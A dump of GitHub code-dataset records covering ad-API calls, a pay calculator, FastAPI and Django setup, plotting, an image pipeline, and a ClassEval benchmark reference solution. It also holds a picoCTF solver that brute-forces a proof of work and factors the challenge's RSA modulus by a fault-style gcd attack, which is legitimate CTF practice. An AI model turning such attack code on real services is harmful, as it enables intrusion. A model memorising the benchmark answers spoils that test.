s2\n#%%\nimport requests\nTABOOLA_BASE = \"https://backstage.taboola.com/backstage/api/1.0\"\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/campaigns_properties/operating_systems\",\n headers=client.authorization_header)\ntaboola_os = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/campaigns_properties/platforms\",\n headers=client.authorization_header)\ntaboola_platforms = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/countries/us/dma\",\n headers=client.authorization_header)\ntaboola_dmas = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/countries/us/regions\",\n headers=client.authorization_header)\ntaboola_states = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/allowed-publishers/\",\n headers=client.authorization_header)\ntaboola_publishers = jmespath.search('results[].account_id',resp.json())\n#%%\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/dictionary/audience_segments/\",\n headers=client.authorization_header)\ntaboola_audiences = resp.json()[\"results\"]\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/dictionary/lookalike_audiences/\",\n headers=client.authorization_header)\nresp.json()\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/dictionary/contextual_segments/\",\n headers=client.authorization_header)\nlen(resp.json()[\"results\"])\n# %%\ns3 = {*taboola_publishers}\nlen(s1-s3),len(s2-s3)\n# %%\n{f[3:] for f in clusterer.enc_features} - s3\n# 
%%\n","repo_name":"pkrishnamurthy1007/adtech","sub_path":"models/taboola/nb.py","file_name":"nb.py","file_ext":"py","file_size_in_byte":16131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28977829197","text":"\n\ndef precio_hora(lista_obj,facturacion,tipo):\n objs=len(lista_obj[1])\n p_hora=0\n for i in range(objs):\n if facturacion >= lista_obj[1][i] and facturacion < lista_obj[1][i+1]:\n p_hora=lista_obj[tipo][i]\n break\n return p_hora\n\ndef tipo_hora(lista_obj):\n print(\"Ingrese el tipo de hora: \")\n for i in range(2,5):\n print(\"Opción \", i-1,\" - \", lista_obj[0][i])\n opc=int(input(\"Ingrese la opción correcta: \"))\n while opc<1 or opc>3:\n opc=int(input(\"Ingrese una opción correcta: \"))\n return opc+1\n\ndef facturacion(lista_obj):\n objs=lista_obj[1][len(lista_obj[1])-1]-1\n facturacion=float(input(\"Ingrese el total de Facturación: \"))\n while facturacion < 0 or facturacion > objs:\n print(\"Ingrese un número mayor que 0 y menor que \",objs)\n facturacion=float(input(\"Ingrese el total de Facturación: \"))\n return facturacion\n\ndef tabla(lista_obj):\n objs0=len(lista_obj)\n objs1=len(lista_obj[1])\n objs2=len(lista_obj[0])\n esp1=\" \"\n for k in range(objs2):\n aux=12\n esp2=aux-len(str(lista_obj[0][k]))\n esp3=esp1*esp2\n print(lista_obj[0][k],end=esp3)\n print()\n for j in range(objs1):\n aux=4\n esp1=\" \"\n esp2=aux-len(str(j))\n esp3=esp1*esp2\n print(esp3,j,end=\"\")\n for i in range(1,objs0):\n aux=6\n esp2=aux-len(str(lista_obj[i][j]))\n esp3=esp1*esp2\n print(\" $\",esp3,lista_obj[i][j],end=\"\")\n print() \n\n\n\"\"\"\nImpresión de tabla considerando la distancia a la derecha\ndef tabla(lista_obj):\n objs0=len(lista_obj)\n objs1=len(lista_obj[0])\n for j in range(objs1):\n aux=6\n esp1=\" \"\n esp2=aux-len(str(j))\n esp3=esp1*esp2\n print(j,end=esp3)\n for i in range(objs0):\n aux=8\n esp2=aux-len(str(lista_obj[i][j]))\n esp3=esp1*esp2\n print(lista_obj[i][j],end=esp3)\n print()\n\n\"\"\"\ndef lista_objetivos():\n obj_sanjuan=[[\"Índice\", \"Ventas\", \"Día Semana\", \"Sábado\", \"Domingo\"],[0\t,\t4000\t,\t6000\t,\t8000\t,\t10000\t,\t11500\t,\t13000\t,\t14500\t,\t16000\t,\t17500\t,\t19000\t,\t20500\t,\t22000\t,\t23500\t,\t25000\t,\t26500\t,\t28000\t,\t29500\t,\t31000],[40\t,\t45\t,\t50\t,\t55\t,\t60\t,\t65\t,\t70\t,\t75\t,\t80\t,\t85\t,\t90\t,\t95\t,\t100\t,\t105\t,\t110\t,\t115\t,\t120\t,\t125\t,\t130],[45\t,\t51\t,\t56\t,\t62\t,\t68\t,\t73\t,\t79\t,\t84\t,\t90\t,\t96\t,\t102\t,\t108\t,\t113\t,\t119\t,\t124\t,\t130\t,\t135\t,\t141\t,\t146],[50\t,\t56\t,\t63\t,\t69\t,\t75\t,\t81\t,\t88\t,\t94\t,\t100\t,\t106\t,\t113\t,\t119\t,\t125\t,\t131\t,\t137\t,\t143\t,\t149\t,\t155\t,\t162]]\n return obj_sanjuan\n\ndef despedida():\n mensaje=\"Gracias por usar el programa...\"\n print(mensaje)\n\notra=\"s\"\nobj_sanjuan=lista_objetivos()\nwhile otra==\"s\" or otra==\"S\":\n tabla(obj_sanjuan)\n print()\n facturac=facturacion(obj_sanjuan)\n print()\n tipo=tipo_hora(obj_sanjuan)\n print()\n cant_horas=float(input(\"Ingrese la cantidad de horas trabajadas: \"))\n while cant_horas<0 or cant_horas>24:\n cant_horas=float(input(\"Ingrese la cantidad de horas correcta: \")) \n hora=precio_hora(obj_sanjuan,facturac,tipo)\n print()\n print(\"El precio de la hora es: $\",hora)\n print(\"Corresponde cobrar: $\",hora*cant_horas)\n\n otra=str(input(\"Ingrese ´s´ si quiere hacer otra consulta: \"))\n\ndespedida()","repo_name":"alopezluz/proyecto01","sub_path":"Cálculo Objetivos San Juan.py","file_name":"Cálculo 
Objetivos San Juan.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28446562265","text":"from fastapi import FastAPI, status\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.exceptions import HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom app.api.errors.http_error import http_error_handler\nfrom app.api.errors.validation_error import http422_error_handler\nfrom app.api.routes.api import router as api_router\nfrom app.core.config import ALLOWED_HOSTS, API_PREFIX, DEBUG, PROJECT_NAME, VERSION\nfrom app.core.events import create_start_app_handler, create_stop_app_handler\n\n\ndef get_fastapi_app(title: str = \"\", debug: bool = False, version: str = \"0.0.0\"):\n    initial_app = FastAPI(title=title, debug=debug, version=version)\n    initial_app.add_middleware(\n        CORSMiddleware,\n        allow_origins=ALLOWED_HOSTS or [\"*\"],\n        allow_credentials=True,\n        allow_methods=[\"*\"],\n        allow_headers=[\"*\"],\n    )\n\n    # App Startup/Shutdown Events\n    initial_app.add_event_handler(\"startup\", create_start_app_handler(initial_app))\n    initial_app.add_event_handler(\"shutdown\", create_stop_app_handler(initial_app))\n\n    # Exception Handlers\n    initial_app.add_exception_handler(HTTPException, http_error_handler)\n    initial_app.add_exception_handler(RequestValidationError, http422_error_handler)\n\n    # Add Routes\n    initial_app.include_router(api_router, prefix=API_PREFIX)\n\n    return initial_app\n\n\napp = get_fastapi_app(title=PROJECT_NAME, debug=DEBUG, version=VERSION)\n\n\n@app.get(\"/\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def root():\n    \"\"\"\n    Root landing message at index.\n    \"\"\"\n    return {\"message\": \"This is root! See /docs to view available endpoints.\"}\n\n\n@app.get(\"/health\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def health_check():\n    \"\"\"\n    Health check endpoint.\n    \"\"\"\n    return {\"message\": \"API is up and healthy.\"}\n","repo_name":"adrianme213/fastapi-api-example","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18758968429","text":"from django.urls import path,re_path\r\n# import views.py\r\nfrom . 
import views\r\n\r\napp_name = 'notice'\r\n\r\nurlpatterns = [\r\n    # Notice list\r\n\r\nre_path(r'^personal/update/$', views.CommentNoticeUpdateView.as_view(), name='readed'),\r\nre_path(r'^personal/message/$',views.Allmessages,name='message'),\r\n]\r\n\r\n\r\n\r\n","repo_name":"jinheshimingrichou/qidian_noval","sub_path":"notice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10980039951","text":"import tkinter as tk\nimport scipy.io as sio\nimport numpy as np\n\n\nclass Interface():\n    def __init__(self):\n        # Interface part\n        self.window = tk.Tk()\n        tk.Label(self.window, text = \"Level file name:\").grid(row = 0)\n        self.level_file_name = tk.StringVar()\n        tk.Entry(self.window, textvariable = self.level_file_name, width = 45).grid(row = 0, column = 1)\n        tk.Button(self.window, text = \"Import\", command = self.import_file).grid(row = 0, column = 2)\n\n        self.text = tk.Text(self.window, width = 20, height = 20)\n        self.text.grid(row = 1)\n\n        self.text2 = tk.Text(self.window, width = 20, height = 20)\n        self.text2.grid(row = 1, column = 1)\n\n        self.window.mainloop()\n\n    def import_file(self):\n        file_name = self.level_file_name.get()\n\n        try:\n            data = sio.loadmat(file_name)\n        except:\n            return\n\n        data[\"scores\"] = np.reshape(data[\"scores\"], (-1,))\n        data[\"results\"] = np.reshape(data[\"results\"], (-1,))\n\n        total_run_time = data[\"scores\"].size\n\n        moves_idxs = np.argsort(data[\"results\"])\n\n        self.text.delete(1.0, tk.END)\n\n        self.text2.delete(1.0, tk.END)\n\n        self.text.insert(tk.END, \" ---Moves---\\n\")\n\n        self.text2.insert(tk.END, \"---Scores---\\n\")\n\n        for i in range(-1, -16, -1):\n            if moves_idxs[i] == 0 or data[\"results\"][moves_idxs[i]] == 0:\n                break\n            self.text.insert(tk.END, \"{0:3d}: {1:5d} times\\n\".format(moves_idxs[i], data[\"results\"][moves_idxs[i]]))\n\n            self.text2.insert(tk.END, \"{}\\n\".format(data[\"scores\"][moves_idxs[i]] / data[\"results\"][moves_idxs[i]]))\n\n\n\n\ndef main():\n    interface = Interface()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"UCLA-StarAI/Analogous-Disentangled-Actor-Critic","sub_path":"utils/logs/AIViewer.py","file_name":"AIViewer.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"24836870177","text":"'''\n# This is a class for processing excel files, including reading and writing excel data, as well as processing specific operations and saving as a new excel file.\n\nimport openpyxl\n\n\nclass ExcelProcessor:\n    def __init__(self):\n        pass\n\n    def read_excel(self, file_name):\n        \"\"\"\n        Reading data from Excel files\n        :param file_name:str, Excel file name to read\n        :return:list of data, Data in Excel\n        \"\"\"\n\n\n    def write_excel(self, data, file_name):\n        \"\"\"\n        Write data to the specified Excel file\n        :param data: list, Data to be written\n        :param file_name: str, Excel file name to write to\n        :return: 0 or 1, 1 represents successful writing, 0 represents failed writing\n        >>> processor = ExcelProcessor()\n        >>> new_data = [\n        >>>     ('Name', 'Age', 'Country'),\n        >>>     ('John', 25, 'USA'),\n        >>>     ('Alice', 30, 'Canada'),\n        >>>     ('Bob', 35, 'Australia'),\n        >>>     ('Julia', 28, 'Germany')\n        >>> ]\n        >>> data = processor.write_excel(new_data, 'test_data.xlsx')\n        \"\"\"\n\n\n    def process_excel_data(self, N, save_file_name):\n        \"\"\"\n        Change the specified column in the Excel file to uppercase\n        :param N: int, The serial number of the column 
that you want to change\n        :param save_file_name: str, source file name\n        :return:(int, str), The former is the return value of write_excel, while the latter is the saved file name of the processed data\n        >>> processor = ExcelProcessor()\n        >>> success, output_file = processor.process_excel_data(1, 'test_data.xlsx')\n        \"\"\"\n\n\n'''\n\nimport openpyxl\n\n\nclass ExcelProcessor:\n    def __init__(self):\n        pass\n\n    def read_excel(self, file_name):\n        data = []\n        try:\n            workbook = openpyxl.load_workbook(file_name)\n            sheet = workbook.active\n            for row in sheet.iter_rows(values_only=True):\n                data.append(row)\n            workbook.close()\n            return data\n        except:\n            return None\n\n    def write_excel(self, data, file_name):\n        try:\n            workbook = openpyxl.Workbook()\n            sheet = workbook.active\n            for row in data:\n                sheet.append(row)\n            workbook.save(file_name)\n            workbook.close()\n            return 1\n        except:\n            return 0\n\n    def process_excel_data(self, N, save_file_name):\n        data = self.read_excel(save_file_name)\n        if data is None or N >= len(data[0]):\n            return 0\n        new_data = []\n        for row in data:\n            new_row = list(row[:])\n            if not str(row[N]).isdigit():\n                new_row.append(str(row[N]).upper())\n            else:\n                new_row.append(row[N])\n            new_data.append(new_row)\n        new_file_name = save_file_name.split('.')[0] + '_process.xlsx'\n        success = self.write_excel(new_data, new_file_name)\n        return success, new_file_name\n\n\n","repo_name":"FudanSELab/ClassEval","sub_path":"data/benchmark_solution_code/ExcelProcessor.py","file_name":"ExcelProcessor.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"3"} +{"seq_id":"18393825305","text":"from Crypto.Util.number import *\n#import sympy\nfrom functools import reduce\nfrom operator import mul\nfrom itertools import combinations\nimport sys\nimport socket, struct, telnetlib\nimport hashlib\nimport string\nimport math\n\n# --- common funcs ---\ndef sock(remoteip, remoteport):\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((remoteip, remoteport))\n\treturn s, s.makefile('rw')\n\ndef read_until(f, delim='\\n'):\n\tdata = ''\n\twhile not data.endswith(delim):\n\t\tdata += f.read(1)\n\treturn data\n\ndef returnarray(i):\n\td = []\n\twhile i > 0:\n\t\td.append(i%64)\n\t\ti = i//64\n\treturn d\n\ndef PoW(first, second):\n\ts = string.printable\n\tprint(len(s))\n\ti = 0\n\tfor k in range(1,1000):\n\t\t#input of k characters\n\t\tfor j in range(pow(100,len(s))):\n\t\t\ti += 1\n\t\t\ttext = first\n\t\t\tces = returnarray(i)\n\t\t\tfor l in range(len(ces)):\n\t\t\t\ttext += s[ces[l]]\n\t\t\t#print(text)\n\t\t\ths = hashlib.md5(text.encode()).hexdigest()\n\t\t\t#print(hs[:5],hs[-6:])\n\t\t\tif hs[-6:] == second:\n\t\t\t\tprint(hs)\n\t\t\t\tprint(text)\n\t\t\t\treturn text\n\t\t\n\t#return \"test\"\n\t\t\n\t\n#HOST can also be an IP address\nHOST, PORT = \"mercury.picoctf.net\", 47414\ns, f = sock(HOST, PORT)\nrecv_m = read_until(f).split()\n#for i in range(len(recv_m)):\n#\tprint(i,recv_m[i])\nfirst = recv_m[6][1:-1]\nsecond = recv_m[-1]\nprint(first,second)\ntext = PoW(first,second)\ns.send(text.encode()+b'\\n')\nrecv_m = read_until(f).split()\nn = int(recv_m[-1])\nprint(recv_m)\n#print(sympy.factorint(n))\nrecv_m = read_until(f).split()\ne = int(recv_m[-1])\nprint(recv_m)\nm = 12345\nmaxD = 1 << 20\nprint(maxD)\nc = pow(m,e,n)\nfor d_p in range(1,maxD+1):\n\tif d_p%10000 == 0: print(d_p)\n\tmm = pow(c,d_p,n)\n\tdif = mm-m\n\tif(dif < 0): dif = -dif\n\tp = math.gcd(dif,n)\n\tif p != 1:\n\t\t#p has been found\n\t\tq = n//p\n\t\tans = p+q\n\t\tans = 
str(ans)\n\t\ts.send(ans.encode()+b\"\\n\")\n\t\tbreak\nprint(\"for d_p finish\")\n#print(e)\n#ne = str(e).encode() + b\"\\n\"\n#s.send(ne)\nwhile True:\n\tprint(read_until(f))\n#How to use read_until\n#It has a return value, so print it or store it in a variable\n#Read one line: read_until(f)\n#Read up to a specific string: read_until(f,\"input\")\n#Store into an array: recv_m = read_until(f).split() or .strip()\n\n#When sending something to the server\n#s.send(b'1\\n') : sends a 1\n#Send it as bytes. To turn str->bytes, append .encode() to the variable\n#Always include a newline, or the end point becomes unclear. ex) s.send(flag.encode() + b'\\n')\n\n","repo_name":"ksbowler/picoCTF_2021","sub_path":"Cryptography/Its_Not_My_Fault_1/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24812627820","text":"class Solution:\n    def subarraySum(self, nums: List[int], k: int) -> int:\n        # Doesn't take negatives into consideration\n#         # Sliding window\n#         # Expand if <= k\n#         # Retract if > k\n#         left = right = 0\n#         tot = nums[0]\n#         ans = 0\n        \n#         while right < len(nums):\n#             if tot == k:\n#                 ans += 1\n#             # Expand while less or equal\n#             if tot <= k or left == right:\n#                 right += 1\n#                 if right == len(nums):\n#                     break\n#                 tot += nums[right]\n            \n#             elif tot > k and left < right:\n#                 tot -= nums[left]\n#                 left += 1\n            \n#         return ans\n\n#         # Simple brute force but takes too long in Python\n#         ans = 0\n#         for i in range(len(nums)):\n#             tot = 0\n#             for j in range(i, len(nums)):\n#                 tot += nums[j]\n#                 if tot == k:\n#                     ans += 1\n            \n#         return ans\n        \n        # Use a dictionary of running sums and a count of how many times it's come up\n        # Then, as we iterate through, our current sum - k will be equal to whatever we need that might be in the dict\n        # ex: imagine array [1, 2, 3, 4, -1] and k = 3\n        # Our running sum array would be [0, 1, 3, 6, 10, 9]\n        # So we can see that from 0 -> 3 is an increase of k. 
From 3 -> 6, and again from 6 -> 9\n # thus the answer should be 3\n \n count = 0\n sums = {\n 0: 1,\n }\n tot = 0\n for num in nums:\n tot += num\n count += sums.get(tot - k, 0)\n sums[tot] = sums.get(tot, 0) + 1\n \n return count \n ","repo_name":"PigsGoMoo/LeetCode","sub_path":"subarray-sum-equals-k/subarray-sum-equals-k.py","file_name":"subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31187578119","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport ml_tools as tools\nimport matplotlib.pyplot as plt\nimport argparse\n\nHOUSE = 'Hogwarts House'\n\n\ndef histogram(df, col, length, i, j):\n plt.subplot(length, length, (i - 1) * length + j)\n plt.hist(df[df[HOUSE] == 'Slytherin'][col],\n alpha=0.4, label=\"Slytherin\", color=\"green\")\n plt.hist(df[df[HOUSE] == 'Gryffindor'][col],\n alpha=0.4, label=\"Gryffindor\", color=\"red\")\n plt.hist(df[df[HOUSE] == 'Ravenclaw'][col],\n alpha=0.4, label=\"Ravenclaw\", color=\"cyan\")\n plt.hist(df[df[HOUSE] == 'Hufflepuff'][col],\n alpha=0.4, label=\"Hufflepuff\", color=\"gold\")\n ax = plt.gca()\n ax.axes.xaxis.set_ticks([])\n ax.axes.yaxis.set_ticks([])\n if (j == 1):\n ax.set_ylabel(col.replace(' ', '\\n'), fontsize=6)\n if (i == length):\n ax.set_xlabel(col.replace(' ', '\\n'), fontsize=8)\n\n\ndef scatter_plot(df, row, col, length, i, j):\n plt.subplot(length, length, (i - 1) * length + j)\n plt.scatter(df[df[HOUSE] == 'Slytherin'][row], df[df[HOUSE]\n == 'Slytherin'][col], alpha=0.4, s=0.1, label=\"Slytherin\", color=\"green\")\n plt.scatter(df[df[HOUSE] == 'Gryffindor'][row], df[df[HOUSE]\n == 'Gryffindor'][col], alpha=0.4, s=0.4, label=\"Gryffindor\", color=\"red\")\n plt.scatter(df[df[HOUSE] == 'Ravenclaw'][row], df[df[HOUSE]\n == 'Ravenclaw'][col], alpha=0.4, s=0.4, label=\"Ravenclaw\", color=\"cyan\")\n plt.scatter(df[df[HOUSE] == 'Hufflepuff'][row], df[df[HOUSE]\n == 'Hufflepuff'][col], alpha=0.4, s=0.4, label=\"Hufflepuff\", color=\"gold\")\n ax = plt.gca()\n ax.axes.xaxis.set_ticks([])\n ax.axes.yaxis.set_ticks([])\n if (j == 1):\n ax.set_ylabel(row.replace(' ', '\\n'), fontsize=6)\n if (i == length):\n ax.set_xlabel(col.replace(' ', '\\n'), fontsize=8)\n\n\ndef pair_plot(df):\n dropped = df.dropna(how='all', axis=1).select_dtypes(\n [np.int64, np.float64])\n length = len(dropped.columns)\n plt.rcParams[\"figure.figsize\"] = [50, 42]\n plt.title(\"Pair plot\")\n for row, i in zip(dropped.columns, range(1, length + 1)):\n for col, j in zip(dropped.columns, range(1, length + 1)):\n # print(i, j, row, col)\n tools.remove_empty_fields(df[col])\n tools.remove_empty_fields(df[row])\n if row == col:\n histogram(df, row, length, i, j)\n else:\n scatter_plot(df, row, col, length, i, j)\n # if i == 1:\n # break\n # if i == 1:\n # break\n plt.legend(bbox_to_anchor=(1.04, 1))\n plt.show()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Plot the pair_plot of a dataset\")\n parser.add_argument(\"csv_file\", type=str, help=\"csv file to plot\")\n args = parser.parse_args()\n try:\n tools.is_valid_path(args.csv_file)\n except Exception as e:\n sys.exit(e)\n df = pd.read_csv(args.csv_file).drop(columns=['Index'])\n pair_plot(df)\n","repo_name":"Lap0u/dslr","sub_path":"pair_plot.py","file_name":"pair_plot.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"25155285477","text":"\"\"\"\nThis class is used to run the entire preprocessing pipeline - \nfrom CZI files to a pyramid of tiles that can be viewed in neuroglancer.\n\nArgs are animal, channel, and downsample, with animal being\nthe only required argument.\nAll imports are listed in the order in which they are used in the pipeline.\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport threading\nfrom timeit import default_timer as timer\n\nfrom lib.FileLocationManager import FileLocationManager\nfrom lib.MetaUtilities import MetaUtilities\nfrom lib.PrepCreater import PrepCreater\nfrom lib.NgPrecomputedMaker import NgPrecomputedMaker\nfrom lib.NgDownsampler import NgDownsampler\nfrom lib.ProgressLookup import ProgressLookup\nfrom lib.TiffExtractor import TiffExtractor\nfrom lib.FileLogger import FileLogger\nfrom lib.ParallelManager import ParallelManager\nfrom lib.Normalizer import Normalizer\nfrom lib.MaskManager import MaskManager\nfrom lib.ImageCleaner import ImageCleaner\nfrom lib.HistogramMaker import HistogramMaker\nfrom lib.ElastixManager import ElastixManager\nfrom controller.sql_controller import SqlController\nfrom utilities.utilities_process import get_hostname\n\n\nclass Pipeline(\n    MetaUtilities,\n    TiffExtractor,\n    PrepCreater,\n    ParallelManager,\n    Normalizer,\n    MaskManager,\n    ImageCleaner,\n    HistogramMaker,\n    ElastixManager,\n    NgPrecomputedMaker,\n    NgDownsampler,\n    FileLogger\n):\n    \"\"\"\n    This is the main class that handles the preprocessing pipeline responsible for converting Zeiss microscopy images (.czi) into neuroglancer\n    viewable formats. The Zeiss module can be swapped out to make the pipeline compatible with other microscopy setups\n    \"\"\"\n    TASK_CREATING_META = \"Yanking meta data from CZI files\"\n    TASK_CREATING_WEB_IMAGES = \"Creating web friendly PNG images\"\n    TASK_EXTRACTING_TIFFS = \"Extracting TIFFs\"\n    TASK_APPLYING_QC = \"Applying QC\"\n    TASK_APPLYING_NORMALIZATION = \"Creating normalization\"\n    TASK_CREATING_MASKS = \"Creating masks\"\n    TASK_APPLYING_MASKS = \"Applying masks\"\n    TASK_CREATING_CLEANED_IMAGES = \"Creating cleaned image\"\n    TASK_CREATING_HISTOGRAMS = \"Making histogram\"\n    TASK_CREATING_COMBINED_HISTOGRAM = \"Making combined histogram\"\n    TASK_CREATING_ELASTIX_TRANSFORM = \"Creating elastix transform\"\n    TASK_CREATING_ELASTIX_METRICS = \"Creating elastix metrics\"\n    TASK_NEUROGLANCER_SINGLE = \"Neuroglancer1 single\"\n    TASK_NEUROGLANCER_PYRAMID = \"Neuroglancer2 pyramid\"\n\n    def __init__(self, animal, channel, downsample, data_path, tg, debug):\n        \"\"\"Setting up the pipeline and the processing configurations\n        Here is how the class is instantiated:\n        pipeline = Pipeline(animal, channel, downsample, data_path, tg, debug)\n\n        The pipeline performs the following steps:\n        1. Extract the images from the microscopy formats (e.g. czi) to tiff format\n        2. Prepare thumbnails of images for quality control\n        3. Clean the images\n        4. Align the images\n        5. Convert to Seung lab neuroglancer cloudvolume format\n\n        Steps 3 and 4 are first performed on downsampled images, and the image masks (for step 3) and the within-stack alignments (for step 4) are\n        upsampled for use in the full resolution images\n\n        Args:\n            animal (str): Animal Id\n            channel (int, optional): channel number. This tells the program which channel to work on and which channel to extract from the czis. Defaults to 1.\n            downsample (bool, optional): Determine if we are working on the full resolution or downsampled version. 
Defaults to True.\n            data_path (str, optional): path to where the images and intermediate steps are stored. Defaults to '/net/birdstore/Active_Atlas_Data/data_root'.\n            debug (bool, optional): determine if we are in debug mode. This is used for development purposes. Defaults to False. (forces processing on single core)\n        \"\"\"\n        self.animal = animal\n        self.channel = channel\n        self.ch_dir = f\"CH{self.channel}\"\n        self.downsample = downsample\n        self.debug = debug\n        self.fileLocationManager = FileLocationManager(animal, data_path=data_path)\n        self.sqlController = SqlController(animal)\n        self.hostname = get_hostname()\n        self.tg = tg\n        self.progress_lookup = ProgressLookup()\n        self.check_programs()\n        self.section_count = self.sqlController.get_section_count(self.animal)\n        super().__init__(self.fileLocationManager.get_logdir())\n\n\n    @staticmethod\n    def check_programs():\n        \"\"\"\n        Make sure the necessary tools are installed on the machine and configure the memory of the tools involved to work with\n        big images.\n        Some tools we use are based on java so we adjust the java heap size limit to 10 GB. This is big enough for our purpose but should\n        be increased accordingly if your images are bigger.\n        If the check fails, check the workernoshell.err.log in your project directory for more information\n        \"\"\"\n        start_time = timer()\n        \n        error = \"\"\n        if not os.path.exists(\"/usr/bin/identify\"):\n            error += \"\\nImagemagick is not installed\"\n\n        if len(error) > 0:\n            print(error)\n            sys.exit()\n        end_time = timer()\n        total_elapsed_time = end_time - start_time\n        print(f\"Check programs took {round(total_elapsed_time,1)} seconds\")\n\n    def run_program_and_time(self, function, function_name):\n        \"\"\"Utility to run a specific function and time it\n\n        Args:\n            function (function): function to run\n            function_name (str): name of the function used to report timing result\n        \"\"\"\n        print(function_name, end=\"\")\n        start_time = timer()\n        self.logevent(f\"START {str(function_name)}, downsample: {str(self.downsample)}\")\n\n        function() # RUN FUNCTION\n\n        end_time = timer()\n        total_elapsed_time = round((end_time - start_time),2)\n        print(f\" took {total_elapsed_time} seconds\")\n        sep = \"*\" * 40 + \"\\n\"\n        self.logevent(f\"{function_name} took {total_elapsed_time} seconds\\n{sep}\")\n\n    def qc_cleanup(self):\n        \"\"\"Post QC to clean up filesystem prior to re-running mask edits\"\"\"\n\n        def background_del(org_path):\n            try:\n                basename = os.path.basename(os.path.normpath(org_path))\n                new_path = os.path.join(org_path, \"..\", \".\" + str(basename))\n                if os.path.exists(org_path):\n                    os.rename(org_path, new_path)\n                    threading.Thread(target=lambda: shutil.rmtree(new_path)).start()\n                else:\n                    print(f\"FOLDER ALREADY DELETED: {basename}\")\n            except OSError as e:\n                print(f\"FOLDER ALREADY DELETED: {new_path} {e}\")\n\n        sep = \"*\" * 40 + \"\\n\"\n        msg = f\"DELETE MASKED FILES FROM {self.fileLocationManager.thumbnail_masked}\"\n        self.logevent(f\"{msg} \\n{sep}\")\n        background_del(self.fileLocationManager.thumbnail_masked)\n\n    def align_cleanup(self):\n        \"\"\"\n        THIS STEP IS RE-RUN IMAGE ALIGNMENT:\n        DELETE FOLDERS:\n        DELETE DB ENTRIES:\n        \"\"\"\n\n        def background_del(org_path):\n            try:\n                basename = os.path.basename(os.path.normpath(org_path))\n                new_path = os.path.join(org_path, \"..\", \".\" + str(basename))\n                if os.path.exists(org_path):\n                    os.rename(org_path, new_path)\n                    threading.Thread(target=lambda: shutil.rmtree(new_path)).start()\n                else:\n                    print(f\"FOLDER ALREADY DELETED: {basename}\")\n            except OSError as e:\n                print(f\"FOLDER 
ALREADY DELETED: {new_path} {e}\")\n\n        sep = \"*\" * 40 + \"\\n\"\n        thumbnail_aligned_dir = self.fileLocationManager.get_thumbnail_aligned()\n        msg = f\"DELETE ALIGNED THUMBNAILS FILES FROM {thumbnail_aligned_dir}\"\n        self.logevent(f\"{msg} \\n{sep}\")\n        background_del(thumbnail_aligned_dir)\n\n        thumbnail_cleaned_dir = self.fileLocationManager.get_thumbnail_cleaned()\n        msg = f\"DELETE CLEANED THUMBNAILS FILES FROM {thumbnail_cleaned_dir}\"\n        self.logevent(f\"{msg} \\n{sep}\")\n        background_del(thumbnail_cleaned_dir)\n\n    def ng_cleanup(self, downsample, channel):\n        \"\"\"\n        THIS STEP IS RE-RUN NEUROGLANCER:\n        DELETE FOLDERS: neuroglancer_data\n        DELETE DB ENTRIES: file_log\n        \"\"\"\n\n        def background_del(org_path):\n            try:\n                basename = os.path.basename(os.path.normpath(org_path))\n                new_path = os.path.join(org_path, \"..\", \".\" + str(basename))\n                if os.path.exists(org_path):\n                    os.rename(org_path, new_path)\n                    dirname = os.path.dirname(org_path)\n                    del_path = os.path.join(dirname, \".\" + str(basename))\n                    threading.Thread(target=lambda: shutil.rmtree(del_path)).start()\n                else:\n                    print(f\"FOLDER ALREADY DELETED: {basename}\")\n            except OSError as e:\n                print(f\"FOLDER ALREADY DELETED: {new_path} {e}\")\n\n        sep = \"*\" * 40 + \"\\n\"\n        OUTPUT_DIR = self.fileLocationManager.get_neuroglancer(\n            self.downsample, self.channel\n        )\n        msg = f\"DELETE NEUROGLANCER FILES FROM {OUTPUT_DIR}\"\n        self.logevent(f\"{msg} \\n{sep}\")\n        print(msg)\n        background_del(OUTPUT_DIR)\n\n        # OUTPUT_DIR = self.fileLocationManager.get_neuroglancer(\"True\", self.channel)\n        # msg = f\"DELETE NEUROGLANCER FILES FROM {OUTPUT_DIR}\"\n        # self.logevent(f\"{msg} \\n{sep}\")\n        # print(msg)\n        # 